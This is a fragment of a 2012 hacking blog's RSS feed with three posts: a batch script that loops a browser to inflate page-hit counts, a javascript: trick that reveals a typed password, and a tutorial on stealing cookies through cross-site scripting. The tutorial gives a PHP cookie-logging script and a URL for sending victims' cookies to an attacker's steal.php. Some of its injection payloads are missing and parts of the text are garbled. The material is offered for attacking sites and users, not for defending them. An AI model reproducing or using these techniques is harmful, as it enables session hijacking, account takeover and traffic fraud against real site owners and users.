&amp;nbsp;  &lt;span style="color: orange;"&gt;&lt;br /&gt;
&lt;/span&gt;</description><link>http://hackit2012.blogspot.com/2012/01/top-15-hacking-software.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-5598554804313267032</guid><pubDate>Thu, 05 Jan 2012 07:22:00 +0000</pubDate><atom:updated>2012-01-11T18:41:09.333+05:30</atom:updated><title>-:Page hits flooder:-</title><description>This small program can flood ur page hits.&lt;br /&gt;
&lt;br /&gt;
but you have to dedicate one browser for it.. like internet explorer method:&lt;br /&gt;
make a batch file with these lines&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: orange;"&gt;@echo off&lt;br /&gt;
:1&lt;br /&gt;
start C:Progra~1Intern~1iexplore.exe “http://yoursite.com“&lt;br /&gt;
ping -n 10 127.0.0.1 &amp;gt;nul&lt;br /&gt;
taskkill.exe /im iexplore.exe&lt;br /&gt;
goto 1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
depending upon your net speed u may increase the 10 secs time wait&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
with 10 sec time u may have 360 hits in an hour&lt;br /&gt;
with 5 sec time u may have 720 hits in an hour</description><link>http://hackit2012.blogspot.com/2012/01/page-hits-flooder.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-7542738124052738111</guid><pubDate>Thu, 05 Jan 2012 07:11:00 +0000</pubDate><atom:updated>2012-01-11T18:40:49.584+05:30</atom:updated><title>-:Asterisk Passwords Using Javascript:-</title><description>Want to Reveal the Passwords Hidden Behind Asterisk (&lt;span style="color: orange;"&gt;****&lt;/span&gt;) ?&lt;br /&gt;
&lt;br /&gt;
Follow the steps given below-&lt;br /&gt;
&lt;br /&gt;
1) Open the Login Page of any website. (eg. http://mail.yahoo.com)&lt;br /&gt;
&lt;br /&gt;
2) Type your 'Username' and 'Password'.&lt;br /&gt;
&lt;br /&gt;
3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: orange;"&gt;javascript: alert(document.getElementById('Passwd').value);&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
4) As soon as you press 'Enter', A window pops up showing Password typed by you..!&lt;br /&gt;
&lt;br /&gt;
Note :- This trick may not be working with firefox.</description><link>http://hackit2012.blogspot.com/2012/01/asterisk-passwords-using-javascript.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2661750801133822613.post-8862540256301764070</guid><pubDate>Thu, 05 Jan 2012 07:09:00 +0000</pubDate><atom:updated>2012-01-11T18:40:05.412+05:30</atom:updated><title>-:Cookie stealing:-</title><description>Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).&lt;br /&gt;
Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie.&lt;br /&gt;
&lt;br /&gt;
Here’s an  example of what might be in your cookie:&lt;br /&gt;
Code:&lt;br /&gt;
username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.&lt;br /&gt;
&lt;br /&gt;
Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This is the process of cookiestealing.&lt;br /&gt;
&lt;br /&gt;
Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
$cookie = $_GET['cookie'];&lt;br /&gt;
$log = fopen(”log.txt”, “a”);&lt;br /&gt;
fwrite($log, $cookie .”n”);&lt;br /&gt;
fclose($log);&lt;br /&gt;
?&amp;gt;And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example:&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.&lt;br /&gt;
&lt;br /&gt;
Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple.&lt;br /&gt;
&lt;br /&gt;
Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.&lt;br /&gt;
&lt;br /&gt;
Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script:&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page.&lt;br /&gt;
&lt;br /&gt;
But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:&lt;br /&gt;
&lt;br /&gt;
Code:&lt;br /&gt;
&lt;a href="http:///#"&gt;Click Me&lt;/a&gt;&lt;br /&gt;
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.</description><link>http://hackit2012.blogspot.com/2012/01/cookie-stealing.html</link><author>noreply@blogger.com (Anonymous)</author><thr:total>0</thr:total></item></channel></rss>